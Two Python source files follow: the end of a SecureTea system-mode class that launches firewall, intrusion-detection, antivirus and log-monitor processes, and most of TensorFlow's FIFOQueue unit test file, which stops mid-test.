self.firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.debug)
self.firewall = True
self.logger.log(
"Initialized Firewall object",
logtype="info"
)
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("ids"):
try:
self.logger.log(
"Initializing Intrusion Detection System (IDS) object",
logtype="info"
)
# Initialize IDS object
self.ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.debug)
self.ids = True
self.logger.log(
"Initialized Intrusion Detection System (IDS) object",
logtype="info"
)
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("antivirus"):
try:
self.logger.log(
"Initializing AntiVirus object",
logtype="info"
)
# Initialize AntiVirus object
self.antivirus_obj = SecureTeaAntiVirus(debug=self.debug,
cred=self.cred["antivirus"])
self.antivirus = True
self.logger.log(
"Initialized AntiVirus object",
logtype="info"
)
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
# Only the debug configuration is required for the System Log Monitor, hence create it directly
try:
self.logger.log(
"Initializing System Log Monitor object",
logtype="info"
)
# Initialize SystemLogEngine object
self.system_log_obj = engine.SystemLogEngine(debug=self.debug)
self.system_log = True
self.logger.log(
"Initialized System Log Monitor object",
logtype="info"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def create_process(self):
"""
Create process for the initialized objects.
Args:
None
Raises:
None
Returns:
None
"""
if self.firewall: # if Firewall object is initialized
firewall_process = multiprocessing.Process(target=self.firewallObj.start_firewall)
self.process_pool.append(firewall_process)
if self.ids: # if IDS object is initialized
ids_process = multiprocessing.Process(target=self.ids_obj.start_ids)
self.process_pool.append(ids_process)
if self.antivirus: # if AntiVirus object is initialized
antivirus_process = multiprocessing.Process(target=self.antivirus_obj.start)
self.process_pool.append(antivirus_process)
if self.system_log: # if System Log Monitor object is initialized
system_log_process = multiprocessing.Process(target=self.system_log_obj.run)
self.process_pool.append(system_log_process)
def start_process(self):
"""
Start all the processes in the process pool
and terminate them gracefully on KeyboardInterrupt.
Args:
None
Raises:
None
Returns:
None
"""
try:
for process in self.process_pool:
process.start()
for process in self.process_pool:
process.join()
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def start_system_mode(self):
"""
Start SecureTea in system mode.
Args:
None
Raises:
None
Returns:
None
"""
# Create / initialize required objects
self.create_objects()
# Create process for the objects
self.create_process()
# Start the process
self.start_process()
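# A minimal usage sketch (hypothetical credential dict; the nested configs are
# elided): each configured module runs in its own process, and the call blocks
# until the processes exit or a KeyboardInterrupt terminates them.
#
#   cred = {'firewall': {...}, 'ids': {...}, 'antivirus': {...}}
#   SystemMode(debug=True, cred=cred).start_system_mode()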
|
fifo_queue_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.FIFOQueue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class FIFOQueueTest(test.TestCase):
def testConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'FIFOQueueV2'
attr { key: 'component_types' value { list { type: DT_FLOAT } } }
attr { key: 'shapes' value { list {} } }
attr { key: 'capacity' value { i: 10 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testMultiQueueConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.FIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32),
shared_name="foo",
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'FIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: 'foo' } }
""", q.queue_ref.op.node_def)
def testConstructorWithShapes(self):
with ops.Graph().as_default():
q = data_flow_ops.FIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32),
shapes=(tensor_shape.TensorShape([1, 1, 2, 3]),
tensor_shape.TensorShape([5, 8])),
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'FIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {
shape { dim { size: 1 }
dim { size: 1 }
dim { size: 2 }
dim { size: 3 } }
shape { dim { size: 5 }
dim { size: 8 } }
} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueHalf(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float16)
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shapes=(3, 2))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
self.assertEqual(1, q.size().eval())
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(
10, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertEqual(4, q.size().eval())
@test_util.run_in_graph_and_eager_modes
def testMultipleDequeues(self):
q = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q.enqueue_many([[1, 2, 3]]))
a, b, c = self.evaluate([q.dequeue(), q.dequeue(), q.dequeue()])
self.assertAllEqual(set([1, 2, 3]), set([a, b, c]))
@test_util.run_in_graph_and_eager_modes
def testQueuesDontShare(self):
q = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q.enqueue(1))
q2 = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q2.enqueue(2))
self.assertAllEqual(self.evaluate(q2.dequeue()), 2)
self.assertAllEqual(self.evaluate(q.dequeue()), 1)
def testEnqueueDictWithoutNames(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
with self.assertRaisesRegexp(ValueError, "must have names"):
q.enqueue({"a": 12.0})
with self.assertRaisesRegexp(ValueError, "must have names"):
q.enqueue_many({"a": [12.0, 13.0]})
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i]], vals)
def testDequeueHalf(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float16)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i]], vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(3, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(self.evaluate(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
for elem, result in zip(elems, results):
self.assertEqual([elem], result)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
x_val, y_val = self.evaluate(dequeued_t)
x, y = elems[i]
self.assertEqual([x], x_val)
self.assertEqual([y], y_val)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
self.assertEqual([0], q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual(1, self.evaluate(size))
dequeued_t.op.run()
self.assertEqual(0, self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i % 4]], vals)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual([0], self.evaluate(size_t))
enqueue_op.run()
self.assertEqual([0], self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpTo(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError("specified shapes"):
q.dequeue_many(0).eval()
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
def testMultiDequeueUpToNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
enqueue_op.run()
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.int32, (4, 4, 4, 4))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testEnqueueWrongShape(self):
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32), ((),
(2)))
with self.assertRaises(ValueError):
q.enqueue(([1, 2], [2, 2]))
with self.assertRaises(ValueError):
q.enqueue_many((7, [[1, 2], [3, 4], [5, 6]]))
def testBatchSizeMismatch(self):
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32,
dtypes_lib.int32), ((), (), ()))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], [1, 2, 3]))
with self.assertRaises(ValueError):
q.enqueue_many(
([1, 2, 3], [1, 2], array_ops.placeholder(dtypes_lib.int32)))
with self.assertRaises(ValueError):
q.enqueue_many(
(array_ops.placeholder(dtypes_lib.int32), [1, 2], [1, 2, 3]))
def testEnqueueManyEmptyTypeConversion(self):
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.float32), (
(), ()))
enq = q.enqueue_many(([], []))
self.assertEqual(dtypes_lib.int32, enq.inputs[1].dtype)
self.assertEqual(dtypes_lib.float32, enq.inputs[2].dtype)
def testEnqueueWrongType(self):
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.float32), (
(), ()))
with self.assertRaises(ValueError):
q.enqueue((array_ops.placeholder(dtypes_lib.int32),
array_ops.placeholder(dtypes_lib.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((array_ops.placeholder(dtypes_lib.int32),
array_ops.placeholder(dtypes_lib.int32)))
def testEnqueueWrongShapeAtRuntime(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32), (
(2, 2), (3, 3)))
elems_ok = np.array([1] * 4).reshape((2, 2)).astype(np.int32)
elems_bad = array_ops.placeholder(dtypes_lib.int32)
enqueue_op = q.enqueue((elems_ok, elems_bad))
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
r"Expected \[3,3\], got \[3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 12).reshape((3, 4))})
def testEnqueueDequeueManyWrongShape(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32), (
(2, 2), (3, 3)))
elems_ok = np.array([1] * 8).reshape((2, 2, 2)).astype(np.int32)
elems_bad = array_ops.placeholder(dtypes_lib.int32)
enqueue_op = q.enqueue_many((elems_ok, elems_bad))
dequeued_t = q.dequeue_many(2)
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Shape mismatch in tuple component 1. "
r"Expected \[2,3,3\], got \[2,3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 24).reshape((2, 3, 4))})
self.evaluate(dequeued_t)
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(1000, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(1000, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(1000, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(101)
enqueue_op.run()
close_op.run()
# Dequeue up to 101 items in parallel on 10 threads, from closed queue.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(50, dtypes_lib.float32, shapes=())
initial_elements = [10.0] * 49
q.enqueue_many((initial_elements,)).run()
enqueue_op = q.enqueue((20.0,))
dequeued_t = q.dequeue()
def enqueue():
for _ in xrange(100):
self.evaluate(enqueue_op)
def dequeue():
for _ in xrange(100):
self.assertTrue(self.evaluate(dequeued_t) in (10.0, 20.0))
enqueue_threads = [self.checkedThread(target=enqueue) for _ in range(10)]
dequeue_threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for enqueue_thread in enqueue_threads:
enqueue_thread.start()
for dequeue_thread in dequeue_threads:
dequeue_thread.start()
for enqueue_thread in enqueue_threads:
enqueue_thread.join()
for dequeue_thread in dequeue_threads:
dequeue_thread.join()
# Dequeue the initial count of elements to clean up.
cleanup_elems = q.dequeue_many(49).eval()
for elem in cleanup_elems:
self.assertTrue(elem in (10.0, 20.0))
def testMixtureOfEnqueueAndEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.int32, shapes=())
enqueue_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
enqueue_op = q.enqueue((enqueue_placeholder,))
enqueuemany_placeholder = array_ops.placeholder(
dtypes_lib.int32, shape=(None,))
enqueuemany_op = q.enqueue_many((enqueuemany_placeholder,))
dequeued_t = q.dequeue()
close_op = q.close()
def dequeue():
for i in xrange(250):
self.assertEqual(i, self.evaluate(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
elements_enqueued = 0
while elements_enqueued < 250:
# With equal probability, run Enqueue or enqueue_many.
if random.random() > 0.5:
enqueue_op.run({enqueue_placeholder: elements_enqueued})
elements_enqueued += 1
else:
count = random.randint(0, min(20, 250 - elements_enqueued))
range_to_enqueue = np.arange(
elements_enqueued, elements_enqueued + count, dtype=np.int32)
enqueuemany_op.run({enqueuemany_placeholder: range_to_enqueue})
elements_enqueued += count
close_op.run()
dequeue_thread.join()
self.assertEqual(0, q.size().eval())
def testMixtureOfDequeueAndDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.int32, shapes=())
enqueue_op = q.enqueue_many((np.arange(250, dtype=np.int32),))
dequeued_t = q.dequeue()
count_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
dequeuemany_t = q.dequeue_many(count_placeholder)
def enqueue():
self.evaluate(enqueue_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
elements_dequeued = 0
while elements_dequeued < 250:
# With equal probability, run Dequeue or dequeue_many.
if random.random() > 0.5:
self.assertEqual(elements_dequeued, self.evaluate(dequeued_t))
elements_dequeued += 1
else:
count = random.randint(0, min(20, 250 - elements_dequeued))
expected_range = np.arange(
elements_dequeued, elements_dequeued + count, dtype=np.int32)
self.assertAllEqual(expected_range,
dequeuemany_t.eval({
count_placeholder: count
}))
elements_dequeued += count
q.close().run()
enqueue_thread.join()
self.assertEqual(0, q.size().eval())
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.FIFOQueue(100, dtypes_lib.int32, ())
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.FIFOQueue(total_count, dtypes_lib.int32, ())
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def dequeue():
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems, self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
